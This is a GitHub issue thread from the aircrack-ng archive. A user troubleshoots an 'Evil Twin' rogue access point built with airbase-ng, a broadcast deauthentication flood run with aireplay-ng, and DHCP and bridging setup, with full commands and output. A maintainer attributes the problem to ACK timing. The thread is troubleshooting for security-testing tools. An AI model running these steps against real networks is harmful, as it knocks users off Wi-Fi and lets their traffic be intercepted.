aircrack-ng / aircrack-ng-archive

Pre-migration repository. New repository ➙
https://github.com/aircrack-ng/aircrack-ng
GNU General Public License v2.0
859 stars 307 forks source link

Can't Get My Experimental PC to Connect to the AP using airebase-ng #158

Open asciiterminal opened 6 years ago

asciiterminal commented 6 years ago

I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue.

Note:i have trued iptables and echo 1 it didnt help

Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode airmon-ng start wlan0

Checking for background proccesses that can interfere with the work airmon-ng check wlan0mon(assigned new name)

Setting up the Fake AP airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon 17:19:25 Created tap interface at0 17:19:25 Trying to set MTU on at0 to 1500 17:19:25 Trying to set MTU on wlan0mon to 1800 17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started. 17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" 17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"

Deauthorizing clients on another terminal

aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon 17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6

Installing DHCP server apt-get install isc-dhcp-server Reading package lists... Done Building dependency tree Reading state information... Done isc-dhcp-server is already the newest version (4.3.5-3+b1). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Configuringnano /etc/dhcp/dhcpd.conf

authoritative; subnet 192.168.1.0 netmask 255.255.255.0 {

option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 8.8.8.8; range 192.168.1.10 192.168.1.200; default-lease-time 600; max-lease-time 7200;

}

Installing bridging utilities

apt-get install bridge-utils Reading package lists... Done Building dependency tree Reading state information... Done bridge-utils is already the newest version (1.5-14). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Bridging interface root@kali:~# brctl addbr evil \Name of the bridge i made root@kali:~#brctl addif evil eth0 \my ethernet connection root@kali:~# brctl addif evil at0 root@kali:~#ifconfig at0 0.0.0.0 up root@kali:~#ifconfig evil up Starting DHCP server root@kali:~#systemctl start smbd.service root@kali:~#dhclient evil

root@kali:~# service isc-dhcp-server restart root@kali:~# service isc-dhcp-server status ? isc-dhcp-server.service - LSB: DHCP server Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled) Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago Docs: man:systemd-sysv-generator(8) Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS) Tasks: 1 (limit: 4915) CGroup: /system.slice/isc-dhcp-server.service +-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0

Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server... Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only. Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file. Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil Dec 06 17:32:33 kali dhcpd2061: Server starting service. Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd. Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server.

/etc/init.d/isc-dhcp-server start ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.

IP gateway

root@kali:~#route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

I have tried the method explained here and yet either i can't connect to the Fake AP or when i do there is no internet

aircrack-ng commented 6 years ago

It is due to ACK timing. Software is not fast enough to do it. A different type of monitor interface need to be used airbase-ng needs to be changed to handle that.